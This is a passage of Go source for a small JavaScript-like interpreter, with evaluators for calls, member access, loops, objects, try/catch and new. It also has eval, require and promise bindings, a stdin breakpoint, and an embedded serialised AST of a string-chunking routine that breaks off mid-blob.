	sentinel := object.ContinueObject{}
	return &sentinel
}
// yunxUnary evaluates a unary/update expression: typeof, logical negation,
// increment/decrement (prefix and postfix), and unary minus. Increment and
// decrement write the updated value back to the lvalue via yunxUpINfo.
// Returns nil for operators it does not recognize.
//
// Fix: removed a leftover debug `fmt.Println(dt.Prefix)` from the UPASD
// branch that printed to stdout on every `--` evaluation.
func yunxUnary(dtt *ast.Statement, env *object.Environment) object.Object {
	dt := (*dtt).(*ast.UnaryExpression)
	qiand := dt.Operator
	switch qiand {
	case token.TYPEOF:
		// typeof x -> the runtime type tag as a string
		dgg := ParseData(&dt.Argument, env)
		return &object.StringObject{Value: dgg.Type()}
	case token.QUFAN:
		// !x -> negated truthiness
		dgg := ParseData(&dt.Argument, env)
		boolinfo := getBoolInfo(&dgg)
		return &object.BoolObject{Value: !boolinfo.Value}
	case token.UPADD:
		// ++x / x++ : numeric operands only; anything else yields NaN.
		dgg := ParseData(&dt.Argument, env)
		if dgg.Type() != token.TYNUM {
			return &object.NanObject{}
		}
		ks := dgg.(*object.NumericObject)
		// prefix yields the updated value, postfix the original one
		dada := ks.Value
		if dt.Prefix {
			dada = ks.Value + 1
		}
		yunxUpINfo(dt.Argument, env, &object.NumericObject{Value: ks.Value + 1})
		return &object.NumericObject{Value: dada}
	case token.UPASD:
		// --x / x-- : mirror of UPADD.
		dgg := ParseData(&dt.Argument, env)
		if dgg.Type() != token.TYNUM {
			return &object.NanObject{}
		}
		ks := dgg.(*object.NumericObject)
		dada := ks.Value
		if dt.Prefix {
			dada = ks.Value - 1
		}
		yunxUpINfo(dt.Argument, env, &object.NumericObject{Value: ks.Value - 1})
		return &object.NumericObject{Value: dada}
	case token.SDD:
		// unary minus; assumes the operand evaluates to a number
		dgg := ParseData(&dt.Argument, env)
		ddddd := dgg.(*object.NumericObject)
		return &object.NumericObject{Value: -ddddd.Value}
	}
	return nil
}
// yunxArrayE evaluates an array literal: each element expression is evaluated
// in order and collected into a fresh array object.
func yunxArrayE(dtt *ast.Statement, env *object.Environment) object.Object {
	arr := (*dtt).(*ast.ArrayExpression)
	result := object.NewArray()
	for _, el := range arr.Elements {
		val := ParseData(el, env)
		result.Value = append(result.Value, &val)
	}
	return &result
}
// yunxFuncD evaluates a function declaration: a closure capturing the current
// environment is built and bound to the declared name.
func yunxFuncD(dtt *ast.Statement, env *object.Environment) object.Object {
	decl := (*dtt).(*ast.FunctionDeclaration)
	name := decl.Id.(*ast.Identifier).Name
	closure := object.FunctionDeclarationObject{Params: decl.Params, Body: decl.Body, Env: env}
	env.Store.Set(name, &closure)
	return nil
}
// yunxFuncE evaluates an anonymous function expression into a closure value
// capturing the current environment.
func yunxFuncE(dtt *ast.Statement, env *object.Environment) object.Object {
	expr := (*dtt).(*ast.FunctionExpression)
	return &object.FunctionDeclarationObject{Params: expr.Params, Body: expr.Body, Env: env}
}
// yunxRETURN evaluates a return statement, wrapping the computed value in the
// return sentinel that unwinds the enclosing call.
func yunxRETURN(dtt *ast.Statement, env *object.Environment) object.Object {
	ret := (*dtt).(*ast.ReturnStatement)
	value := ParseData(&ret.Argument, env)
	return &object.ReturnStatementObject{Value: value}
}
// yunxCall evaluates a call expression. The callee and arguments are
// evaluated first; then the call dispatches to, in order: a registered
// native builtin (Zhidy), a string/array .slice(...) pseudo-method, or a
// user-defined closure. call/apply rebind `this` via the Callthis flag set
// by yunxMember. A RETURN sentinel from the body is unwrapped to its value.
func yunxCall(dtt *ast.Statement, env *object.Environment) object.Object {
	dt := (*dtt).(*ast.CallExpression)
	//if dt.Caller.StatementNode() == token.IDENT {
	//	bbb := dt.Caller.(*ast.Identifier).Name
	//
	//}
	funct := ParseData(&dt.Caller, env)
	dbb := []*object.Object{}
	for _, hh := range dt.Arguments {
		arg := ParseData(hh, env)
		dbb = append(dbb, &arg)
	}
	if funct.Type() == token.BULLE && dt.Caller.StatementNode() == token.IDENT {
		// unresolved identifier: try the native builtin table
		jiii := dt.Caller.(*ast.Identifier)
		vay, ok := Zhidy[jiii.Name]
		if ok {
			return (*vay)(dbb)
		}
	}
	if funct.Type() == token.TYSTR {
		// "str".slice(a, b) — the Key flag was set by yunxMember
		kppp := funct.(*object.StringObject)
		if kppp.Key == token.Slice {
			ldasd0 := (*dbb[0]).(*object.NumericObject)
			ldasd1 := (*dbb[1]).(*object.NumericObject)
			return &object.StringObject{
				Value: kppp.Slice(int(ldasd0.Value), int(ldasd1.Value)),
			}
		}
	} else if funct.Type() == token.ArrayE {
		// arr.slice(a, b)
		kppp := funct.(*object.Environment)
		if kppp.Key == token.Slice {
			ldasd0 := (*dbb[0]).(*object.NumericObject)
			ldasd1 := (*dbb[1]).(*object.NumericObject)
			kkoo := kppp.Slice(int(ldasd0.Value), int(ldasd1.Value))
			nkk := object.NewArray()
			nkk.Value = kkoo
			return &nkk
		}
	}
	// busy-wait for async producers that have not populated the callee yet;
	// bail out after a bounded number of spins
	dasd := 0
	for {
		if funct.Type() != token.NULL {
			break
		}
		dasd += 1
		if dasd > 100000000 {
			fmt.Println("没有找到可以执行的函数")
			os.Exit(0)
		}
	}
	kfunob := (funct).(*object.FunctionDeclarationObject)
	kfunob.Args = dbb
	var fuenv *object.Environment
	if dt.Caller.StatementNode() == token.Member {
		// method call: run in the closure's captured environment (set to the
		// owning object by yunxMember)
		//if kfunob.Env == nil {
		//	dgg := dt.Caller.(*ast.MemberExpression)
		//	kff := ParseData(&dgg.Object, env)
		//	if kff.Type() == token.THIS {
		//		bjjj := kff.(*object.Environment)
		//		fuenv = object.NewEnv(bjjj)
		//	}
		//} else {
		//	fuenv = kfunob.Env
		//}
		fuenv = kfunob.Env
	} else {
		fuenv = object.NewEnv(env)
	}
	if kfunob.Callthis == 1 {
		// fn.call(thisArg, a, b, ...)
		dadshkj := (*dbb[0]).(*object.Environment)
		fuenv = dadshkj
		dbb = dbb[1:]
	} else if kfunob.Callthis == 2 {
		// fn.apply(thisArg, [a, b, ...])
		dadshkj := (*dbb[0]).(*object.Environment)
		fuenv = dadshkj
		dasd := (*dbb[1]).(*object.Environment)
		dbb = dasd.Value
	}
	// bind parameters; missing arguments become null
	for idx, vkey := range kfunob.Params {
		zzkey := (*vkey).(*ast.Identifier).Name
		if idx >= len(dbb) {
			//fuenv.Store[zzkey] = &object.NULLObject{}
			fuenv.Store.Set(zzkey, &object.NULLObject{})
			continue
		}
		//fuenv.Store[zzkey] = *dbb[idx]
		fuenv.Store.Set(zzkey, *dbb[idx])
	}
	// expose the raw argument list as `arguments`
	knn := object.NewArray()
	knn.Value = dbb
	fuenv.Store.Set(token.Arguments, &knn)
	if kfunob.IsNative == 1 {
		return (*kfunob.NativeBody)(kfunob)
	}
	djii := ParseData(&kfunob.Body, fuenv)
	if djii == nil {
		return &object.NULLObject{}
	}
	if djii.Type() == token.RETURN {
		dd := djii.(*object.ReturnStatementObject)
		return dd.Value
	}
	return djii
}
// yunxMember evaluates a member expression (obj.prop / obj[idx]). It handles
// function .call/.apply flags, array indexing and .slice/.length, byte-buffer
// indexing and .length, string character access and .length, and generic
// object property lookup (numeric keys normalized to strings). When the
// resolved member is a function, its captured Env is rebound to the owning
// object so a later yunxCall sees the right `this`.
func yunxMember(dtt *ast.Statement, env *object.Environment) object.Object {
	dt := (*dtt).(*ast.MemberExpression)
	left := ParseData(&dt.Object, env)
	right := ParseData(&dt.Property, env)
	//fmt.Println(left)
	//if left == nil {
	//	fmt.Println()
	//}
	if left.Type() == token.FUN && right.Type() == token.TYSTR {
		// fn.call / fn.apply: mark the closure; yunxCall consumes the flag
		dasda := left.(*object.FunctionDeclarationObject)
		dasd := right.(*object.StringObject).Value
		if dasd == token.CALL {
			dasda.Callthis = 1
			return dasda
		} else if dasd == token.APPLY {
			dasda.Callthis = 2
			return dasda
		}
	}
	if left.Type() == token.ArrayE {
		dsg := left.(*object.Environment)
		if right.Type() == token.TYNUM {
			// arr[i]; out-of-range or unset slots read as null
			hjj := right.(*object.NumericObject)
			lpINt := int(hjj.Value)
			if len(dsg.Value) <= lpINt {
				return &object.NULLObject{}
			}
			lpffffp := dsg.Value[lpINt]
			if lpffffp == nil {
				return &object.NULLObject{}
			}
			return *lpffffp
		} else {
			// arr.prop; fall back to .slice / .length pseudo-members
			hjj := right.(*object.StringObject)
			lpffffp, _ := dsg.Store.Get(hjj.Value)
			if lpffffp == nil {
				if right.ToString() == token.Slice {
					lkkk := left.(*object.Environment)
					lkkk.Key = token.Slice
					return left
				} else if right.ToString() == token.Length {
					lkkk := left.(*object.Environment)
					ddd := &object.NumericObject{Value: float64(len(lkkk.Value))}
					return ddd
				}
				return &object.NULLObject{}
			}
			if lpffffp.Type() == token.FUN {
				// rebind the method's environment to the owning array
				jj := left.(*object.Environment)
				lpffffp.(*object.FunctionDeclarationObject).Env = jj
			}
			return lpffffp
		}
	} else {
		if left.Type() == token.BYTE && right.Type() == token.TYSTR && right.ToString() == token.Length {
			dd := left.(*object.ByteObject)
			return &object.NumericObject{Value: float64(len(dd.Value))}
		}
		if left.Type() == token.BYTE && right.Type() == token.TYNUM {
			dd := left.(*object.ByteObject)
			ddIdx := right.(*object.NumericObject).Value
			return &object.NumericObject{Value: float64(dd.Value[int(ddIdx)])}
		}
		var key string
		if right.Type() == token.TYNUM {
			if left.Type() == token.TYSTR {
				// "str"[i]
				hjj := right.(*object.NumericObject)
				lkkk := left.(*object.StringObject)
				// convert to runes so indexing is by character, not byte
				runes := []rune(lkkk.Value)
				return &object.StringObject{Value: string(runes[int64(hjj.Value):int64(hjj.Value+1)])}
			} else {
				hjj := right.(*object.NumericObject)
				key = strconv.Itoa(int(hjj.Value))
			}
		} else {
			if left.Type() == token.TYSTR {
				if right.ToString() == token.Length {
					// rune count, not byte length
					lkkk := left.(*object.StringObject)
					ddd := &object.NumericObject{Value: float64(utf8.RuneCountInString(lkkk.Value))}
					return ddd
				}
				// NOTE(review): any other string member marks the string for
				// slicing regardless of the property name — confirm intent.
				//hjj := right.(*object.StringObject)
				lkkk := left.(*object.StringObject)
				lkkk.Key = token.Slice
				return left
			} else {
				hjj := right.(*object.StringObject)
				key = hjj.Value
			}
		}
		jh := findKey(key, left.(*object.Environment))
		if jh == nil || jh.Type() == token.NULL {
			if left.Type() == token.Object && right.ToString() == token.Length {
				lkkk := left.(*object.Environment)
				ddd := &object.NumericObject{Value: float64(len(lkkk.Store.M))}
				return ddd
			}
			return &object.NULLObject{}
		}
		if jh.Type() == token.FUN {
			// rebind the method's environment to the owning object
			jj := left.(*object.Environment)
			jh.(*object.FunctionDeclarationObject).Env = jj
		}
		return jh
	}
}
// yunxFOR executes a C-style for statement: run the optional init once,
// then loop while the optional test evaluates truthy, executing the body
// and the optional update expression on every iteration.
// A BREAK result stops the loop, CONTINUE proceeds, RETURN propagates up.
func yunxFOR(dtt *ast.Statement, env *object.Environment) object.Object {
	stmt := (*dtt).(*ast.ForStatement)
	initStmt := stmt.Init
	testStmt := stmt.Test
	updateStmt := stmt.Updata
	bodyStmt := stmt.Body

	if initStmt != nil {
		ParseData(&initStmt, env)
	}
	for {
		if testStmt != nil {
			cond := ParseData(&testStmt, env)
			if !getBoolInfo(&cond).Value {
				break
			}
		}
		result := ParseData(&bodyStmt, env)
		// NOTE: the update expression runs even when the body broke,
		// continued or returned — matching the original implementation.
		if updateStmt != nil {
			ParseData(&updateStmt, env)
		}
		if result == nil {
			continue
		}
		switch result.Type() {
		case token.BREAK:
			return nil
		case token.CONTINUE:
			continue
		case token.RETURN:
			return result
		}
	}
	return nil
}
// yunxFOI executes a for-in statement: the right-hand side is evaluated
// and its iteration keys collected (property names for object-like
// values, numeric indices for arrays); the body then runs once per key
// with the declared loop variable bound in the current environment.
func yunxFOI(dtt *ast.Statement, env *object.Environment) object.Object {
	stmt := (*dtt).(*ast.ForInStatement)
	left := stmt.Left
	target := ParseData(&stmt.Right, env)

	keys := make([]object.Object, 0)
	switch target.Type() {
	case token.Object, token.ENV, token.THIS:
		objEnv := target.(*object.Environment)
		for name := range objEnv.Store.M {
			keys = append(keys, &object.StringObject{Value: name})
		}
	case token.ArrayE:
		arrEnv := target.(*object.Environment)
		for i := range arrEnv.Value {
			keys = append(keys, &object.NumericObject{Value: float64(i)})
		}
	default:
		fmt.Println("can not for in the object !")
		os.Exit(0)
	}

	bodyStmt := stmt.Body
	if left != nil {
		ParseData(&left, env)
	}
	// The loop variable is the first declarator of the left-hand var
	// declaration (e.g. `for (var k in obj)`).
	loopVar := (*left.(*ast.VariableDeclaration).Declarations[0]).(*ast.Identifier).Name
	for _, key := range keys {
		env.Store.Set(loopVar, key)
		result := ParseData(&bodyStmt, env)
		if result == nil {
			continue
		}
		switch result.Type() {
		case token.BREAK:
			return nil
		case token.CONTINUE:
			continue
		case token.RETURN:
			return result
		}
	}
	return nil
}
// yunxObject evaluates an object literal into a new object environment
// whose outer scope is the current one; each property value is evaluated
// in the surrounding environment and stored under its key.
func yunxObject(dtt *ast.Statement, env *object.Environment) object.Object {
	expr := (*dtt).(*ast.ObjectExpression)
	obj := object.NewObject()
	obj.Outer = env
	for _, propStmt := range expr.Properties {
		prop := (*propStmt).(*ast.Property)
		// A key may be written as a string literal or a bare identifier.
		var name string
		switch prop.Key.StatementNode() {
		case token.Stri:
			name = prop.Key.(*ast.StringLiteral).Value
		case token.IDENT:
			name = prop.Key.(*ast.Identifier).Name
		}
		obj.Store.Set(name, ParseData(&prop.Value, env))
	}
	return &obj
}
// Try runs fn(ass, dddd) and converts any panic into an ordinary error,
// so interpreter failures inside a try-block can be caught by Catch.
func Try(fn func(*ast.Statement, *object.Environment) object.Object, ass *ast.Statement, dddd *object.Environment) (err error) {
	defer func() {
		r := recover()
		if r == nil {
			return
		}
		if e, ok := r.(error); ok {
			err = e
			return
		}
		err = fmt.Errorf("panic: %v", r)
	}()
	fn(ass, dddd)
	return nil
}
// Catch invokes handler with err when err is non-nil; a nil err is a no-op.
func Catch(err error, handler func(error)) {
	if err == nil {
		return
	}
	handler(err)
}
// yunxTRY executes a try/catch statement. The try block runs in its own
// child scope; on error the catch clause runs in a fresh scope with the
// error message bound to the catch parameter (when one is declared).
// Always yields NULL.
func yunxTRY(dtt *ast.Statement, env *object.Environment) object.Object {
	stmt := (*dtt).(*ast.TryStatement)
	tryScope := object.NewEnv(env)
	Catch(Try(ParseData, &stmt.Block, tryScope), func(e error) {
		catchScope := object.NewEnv(env)
		clause := stmt.Handler.(*ast.CatchClause)
		if clause.Param != nil {
			catchScope.Store.Set(clause.Param.(*ast.Identifier).Name, &object.StringObject{Value: e.Error()})
		}
		ParseData(&clause.Body, catchScope)
	})
	return &object.NULLObject{}
}
// yunxTHIS resolves `this`: the nearest enclosing environment marked
// with the THIS type, or the outermost environment when none is marked.
func yunxTHIS(dtt *ast.Statement, env *object.Environment) object.Object {
	cur := env
	for cur.Type() != token.THIS && cur.Outer != nil {
		cur = cur.Outer
	}
	return cur
}
// yunxNEW evaluates a `new Callee(args...)` expression: the callee is
// resolved to a function object, its arguments are evaluated in the
// caller's scope, a fresh THIS-typed environment is built with the
// parameters bound, the body (or native body) is executed against it,
// and the constructed environment is returned as the new instance.
func yunxNEW(dtt *ast.Statement, env *object.Environment) object.Object {
	dt := (*dtt).(*ast.NewExpression)
	funct := ParseData(&dt.Callee, env)
	// Evaluate each constructor argument in the caller's scope.
	dbb := []*object.Object{}
	for _, hh := range dt.Arguments {
		arg := ParseData(hh, env)
		dbb = append(dbb, &arg)
	}
	//if funct.Type() == token.BULLE && dt.Callee.StatementNode() == token.IDENT {
	//	dasd := dt.Callee.(*ast.Identifier)
	//	if dasd.Name == token.Promise {
	//		ji := ParseData
	//		return promise.Init(&ji, dbb[0], env)
	//	}
	//
	//}
	kfunob := (funct).(*object.FunctionDeclarationObject)
	kfunob.Args = dbb
	// The new instance is an environment marked as THIS.
	fuenv := object.NewEnv(env)
	fuenv.TypeInfo = token.THIS
	// Bind parameters positionally; missing arguments become NULL.
	for idx, vkey := range kfunob.Params {
		zzkey := (*vkey).(*ast.Identifier).Name
		if idx >= len(dbb) {
			fuenv.Store.Set(zzkey, &object.NULLObject{})
			continue
		}
		fuenv.Store.Set(zzkey, *dbb[idx])
	}
	if kfunob.IsNative == 1 {
		// Native constructors receive the instance through the
		// function object's Env field and return their own result.
		kfunob.Env = fuenv
		return (*kfunob.NativeBody)(kfunob)
	} else {
		ParseData(&kfunob.Body, fuenv)
	}
	return fuenv
}
// Promise is the native binding behind `Promise(executor)`: it hands the
// executor callback, the interpreter entry point, and the calling
// environment over to the promise runtime.
func Promise(myfun *object.FunctionDeclarationObject) object.Object {
	executor := myfun.Args[0]
	evalFn := ParseData
	return promise.Init(&evalFn, executor, myfun.Env)
}
// Wait is the native binding that blocks until the promise runtime has
// drained its pending work; it always yields NULL.
func Wait(myfun *object.FunctionDeclarationObject) object.Object {
	promise.Done()
	return &object.NULLObject{}
}
// ParseData is the interpreter's central dispatcher: it inspects the
// statement's node-type tag and routes evaluation to the matching
// handler. Returns nil for statements that produce no value, or when
// the node type is unrecognized.
func ParseData(dtt *ast.Statement, env *object.Environment) object.Object {
	if *dtt == nil {
		return nil
	}
	Leix := (*dtt).StatementNode()
	//fmt.Println(Leix)
	switch Leix {
	case token.Bin:
		return yunxBin(dtt, env)
	case token.Unary:
		return yunxUnary(dtt, env)
	case token.INT:
		return yunxINT(dtt)
	case token.Stri:
		return yunxStr(dtt)
	case token.VAR:
		return yunxVar(dtt, env)
	case token.IDENT:
		return yunxIDENT(dtt, env)
	case token.Ass:
		return yunxAss(dtt, env)
	case token.IfStat:
		return yunxIfStat(dtt, env)
	case token.ForS:
		return yunxFOR(dtt, env)
	case token.ForI:
		return yunxFOI(dtt, env)
	case token.Block:
		return yunxBlock(dtt, env)
	case token.BREAK:
		return yunxBleak(dtt, env)
	case token.CONTINUE:
		return yunxCONTINUE(dtt, env)
	case token.ArrayE:
		return yunxArrayE(dtt, env)
	case token.TRY:
		return yunxTRY(dtt, env)
	case token.Debug:
		// Interactive breakpoint: read commands from stdin until "c"
		// (continue); any other input is evaluated in the current scope
		// and the result printed.
		for {
			fmt.Printf("断点中:")
			scanner := bufio.NewScanner(os.Stdin)
			// read the next input line
			scanner.Scan()
			input := scanner.Text()
			input = strings.TrimSpace(input)
			// check whether reading stdin failed
			if err := scanner.Err(); err != nil {
				fmt.Println("读取输入时发生错误:", err)
				return nil
			}
			// An optional single-letter "x:" prefix selects the command;
			// plain non-empty input defaults to "w" (evaluate).
			zl := ""
			if len(input) >= 2 && input[1:2] == ":" {
				zl = input[0:1]
				input = input[1:]
			} else if len(input) > 0 {
				zl = "w"
			}
			if zl == "c" {
				return nil
			} else if zl == "w" {
				sz := EvalTG(input+";", env)
				fmt.Println(sz)
			}
		}
		return nil
	case token.Member:
		return yunxMember(dtt, env)
	case token.Object:
		return yunxObject(dtt, env)
	case token.FuncD:
		return yunxFuncD(dtt, env)
	case token.FuncE:
		return yunxFuncE(dtt, env)
	case token.Call:
		return yunxCall(dtt, env)
	case token.RETURN:
		return yunxRETURN(dtt, env)
	case token.THIS:
		return yunxTHIS(dtt, env)
	case token.NEW:
		return yunxNEW(dtt, env)
	}
	return nil
}
// findKey looks up key in env and, failing that, walks outward through
// the enclosing scopes; NULL is returned when no scope binds the key.
func findKey(key string, env *object.Environment) object.Object {
	for scope := env; scope != nil; scope = scope.Outer {
		if value, ok := scope.Store.Get(key); ok {
			return value
		}
	}
	return &object.NULLObject{}
}
// setKey assigns value to the nearest enclosing scope that already binds
// key; when no scope does, the binding is created in the outermost scope.
// The assigned value is returned.
func setKey(key string, value object.Object, env *object.Environment) object.Object {
	scope := env
	for {
		if _, ok := scope.Store.Get(key); ok {
			scope.Store.Set(key, value)
			return value
		}
		if scope.Outer == nil {
			scope.Store.Set(key, value)
			return value
		}
		scope = scope.Outer
	}
}
// EvalDDD is the native `eval` binding.
// Args[0] is the source code string (a ";" is appended before lexing);
// Args[1] is the environment (`this`) to evaluate in.
// Returns the last statement's value, or NULL when there is none.
func EvalDDD(myfun *object.FunctionDeclarationObject) object.Object {
	args := myfun.Args
	source := (*args[0]).(*object.StringObject).Value + ";"
	target := (*args[1]).(*object.Environment)
	lx := lexer.New(source)
	program := parse.NewParse((*lx).Input())
	var last object.Object
	for _, stmt := range program {
		last = ParseData(stmt, target)
	}
	if last == nil {
		return &object.NULLObject{}
	}
	return last
}
//func getCyDt(this js.Value, inputs []js.Value) interface{} {
// jii := inputs[0].String()
// alldt, _ := allenv.Store.Get("startFun")
// kd := alldt.(*object.FunctionDeclarationObject)
// env := object.NewEnv(allenv)
// env.Store.Set("cbu", &object.StringObject{Value: jii})
// allenv.Store.Set("l", &object.StringObject{Value: jii})
//
// ParseData(&kd.Body, env)
//
// return js.ValueOf("data in window.cydata")
//}
//
//func registerCallbacks() {
// js.Global().Set("getCyDt", js.FuncOf(getCyDt))
//}
// Require is the native `require` binding: it loads, evaluates and
// caches a module file, returning the module's environment.
// Args[0] is the module path; a ".js" suffix is appended when missing.
// A module is evaluated at most once — subsequent requires return the
// cached environment.
func Require(myfun *object.FunctionDeclarationObject) object.Object {
	dte := myfun.Args
	daoirfile := (*dte[0]).ToString()
	// Bug fix: the original sliced daoirfile[len-3:] unconditionally,
	// which panics on module names shorter than 3 characters.
	if !strings.HasSuffix(daoirfile, ".js") {
		daoirfile += ".js"
	}
	// Return the cached module environment when already loaded.
	if dsdaskj, okk := requireall.DtInfo[daoirfile]; okk {
		return dsdaskj
	}
	requireall.IsDo = daoirfile // mark the module as currently loading
	code := require.ReadFile(daoirfile)
	env := object.NewEnv(nil)
	dt := lexer.New(code)
	kk := (*dt).Input()
	fff := parse.NewParse(kk)
	StartEval(fff, env)
	requireall.IsDo = ""
	requireall.DtInfo[daoirfile] = env
	return env
}
// allenv holds the root interpreter environment for the current run.
var allenv *object.Environment

// requireall caches module environments loaded via require().
var requireall *require.RequireInfo
// new_Func wraps a Go callback as a native function object that the
// interpreted language can call.
func new_Func(ddd *func(*object.FunctionDeclarationObject) object.Object) object.Object {
	return &object.FunctionDeclarationObject{IsNative: 1, NativeBody: ddd}
}
// StartEval installs the built-in bindings into env, marks it as the
// root `this` scope, evaluates the parsed program statement by
// statement, prints the final result (when any) and returns it.
func StartEval(data []*ast.Statement, env *object.Environment) object.Object {
	builtins, globals := banding.Init()
	for name, fn := range builtins {
		env.Store.Set(name, fn)
	}
	// Native bindings are registered by address, so bind them to locals first.
	evalFn, requireFn, promiseFn, waitFn := EvalDDD, Require, Promise, Wait
	env.Store.Set(token.Eval, new_Func(&evalFn))
	env.Store.Set(token.Require, new_Func(&requireFn))
	env.Store.Set(token.Promise, new_Func(&promiseFn))
	env.Store.Set(token.Wait, new_Func(&waitFn))

	allenv = env
	env.TypeInfo = token.THIS
	for name, value := range globals {
		env.Store.Set(name, value)
	}

	var result object.Object
	for _, stmt := range data {
		result = ParseData(stmt, env)
	}
	//registerCallbacks()
	if result != nil {
		fmt.Println(result.ToString())
	}
	return result
}
// Eval runs a complete source string in a fresh root environment,
// initializing the require cache and the promise runtime, and waits for
// pending promise work before returning the program's result.
func Eval(code string) object.Object {
	if requireall == nil {
		requireall = &require.RequireInfo{DtInfo: map[string]*object.Environment{}}
	}
	rootEnv := object.NewEnv(nil)
	promise.CyJSInit()
	lx := lexer.New(code)
	program := parse.NewParse((*lx).Input())
	result := StartEval(program, rootEnv)
	promise.Done()
	return result
}
// EvalTG evaluates a source string inside an existing environment
// (used by the interactive debugger's "w" command).
func EvalTG(code string, env *object.Environment) object.Object {
	lx := lexer.New(code)
	program := parse.NewParse((*lx).Input())
	return StartEval(program, env)
}
// EvalDt evaluates a program whose AST is embedded below as a raw-string
// blob, running it on a goroutine with the promise runtime active and
// blocking until it finishes. Always returns nil.
func EvalDt() object.Object {
encodedText := `{"Body":[{"Id":{"Name":"data","PAIX":-1,"TypeInfo":"aaaaa"},"Params":[{"Name":"strInfo","PAIX":-1,"TypeInfo":"aaaaa"}],"Body":{"Body":[{"Token":"var","Declarations":[{"Name":"strList","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Elements":[],"PAIX":0,"TypeInfo":"ppppp"},"PAIX":0,"TypeInfo":"var"},{"Init":{"Token":"var","Declarations":[{"Name":"i","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"var"},"Test":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Caller":{"Name":"len","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"strInfo","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"Operator":"\u003c","PAIX":0,"TypeInfo":"yyy"},"Updata":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":4,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},"Body":{"Body":[{"Token":"var","Declarations":[{"Name":"cd","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Name":"len","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"strInfo","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"vhh","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":4,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"var"},{"Test":{"Left":{"Name":"vhh","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Name":"cd","PAIX":-1,"TypeInfo":"aaaaa"},"Operator":"\u003e=","PAIX":0,"TypeInfo":"yyy"},"Consequent":{"Body":[{"Token":"var","Declarations":[{"Name":"t1","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Object":{"Name":"strInfo","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":"slice","PAIX":0,"TypeInfo":"ooooo"},"PAIX":0,"TypeInfo":"oooo"},"Arguments":[{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},{"Caller":{"Name":"len","PAIX":-1,"TypeInfo":"aaaaa
"},"Arguments":[{"Name":"strInfo","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Init":{"Token":"var","Declarations":[{"Name":"i2","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"var"},"Test":{"Left":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":4,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Right":{"Name":"cd","PAIX":-1,"TypeInfo":"aaaaa"},"Operator":"-","PAIX":0,"TypeInfo":"yyy"},"Operator":"\u003c","PAIX":0,"TypeInfo":"yyy"},"Updata":{"Left":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},"Body":{"Body":[{"Left":{"Name":"t1","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"t1","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":" 
","PAIX":0,"TypeInfo":"ooooo"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"pppp"},{"Token":"var","Declarations":[{"Name":"a1","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Name":"cychar","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Object":{"Name":"t1","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"a2","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Name":"cychar","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Object":{"Name":"t1","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"a3","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Name":"cychar","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Object":{"Name":"t1","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":2,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"a4","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Na